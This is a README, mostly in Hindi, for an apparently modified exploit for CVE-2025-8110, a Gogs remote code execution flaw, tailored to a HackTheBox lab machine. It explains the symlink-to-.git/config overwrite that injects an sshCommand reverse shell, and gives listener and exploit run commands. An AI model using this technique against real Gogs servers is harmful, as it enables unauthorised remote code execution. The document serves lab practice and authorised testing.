
CVE-2025-8110 Specifically for the Silentium box on HTB.
अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
यह zAbuQasem/gogs-CVE-2025-8110 का एक संशोधित संस्करण है, जिसे HackTheBox पर Silentium मशीन के विरुद्ध काम करने के लिए अनुकूलित किया गया है। मूल PoC को Silentium की विशिष्ट Gogs कॉन्फ़िगरेशन और प्रमाणीकरण प्रवाह को संभालने के लिए समायोजन की आवश्यकता थी।
CVE-2025-8110 Gogs में एक रिमोट कोड निष्पादन भेद्यता है, जो एक स्व-होस्टेड Git सेवा है।
Gogs का फ़ाइल-अपडेट API एंडपॉइंट (PUT /api/v1/repos/.../contents/<file>) यह सत्यापित नहीं करता कि लक्ष्य फ़ाइल एक सिमलिंक है या नहीं। एक प्रमाणित हमलावर एक रिपॉजिटरी में एक सिमलिंक (जो .git/config की ओर इशारा करता है) डाल सकता है, फिर API का उपयोग करके उसे एक दुर्भावनापूर्ण पेलोड से ओवरराइट कर सकता है। पेलोड git कॉन्फ़िग में एक कस्टम sshCommand इंजेक्ट करता है, जिसे Gogs अगली बार उस रिपॉजिटरी पर SSH ऑपरेशन करने पर सर्वर-साइड निष्पादित करता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।
malicious_link -> .git/config) लगाता है, और इसे पुश करता है।.git/config लिखता है जिसमें sshCommand = <reverse shell> होता है।.git/config को ओवरराइट करता है, अगले SSH ऑपरेशन पर शेल को ट्रिगर करता है।निर्भरताएँ स्थापित करें:
pip install -r requirements.txt
एक लिसनर प्रारंभ करें:
nc -lvnp <PORT>
एक्सप्लॉइट चलाएँ:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
वैकल्पिक — Burp Suite के माध्यम से रूट करें:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| Flag | Description |
|---|
-u | Gogs बेस URL |
-lh | आपका हमलावर IP (रिवर्स शेल होस्ट) |
-lp | आपका लिसनर पोर्ट |
-un | आपका पंजीकृत Gogs उपयोगकर्ता नाम |
-pw | आपका Gogs पासवर्ड |
-x | (वैकल्पिक) localhost:8080 पर Burp के माध्यम से ट्रैफ़िक रूट करें |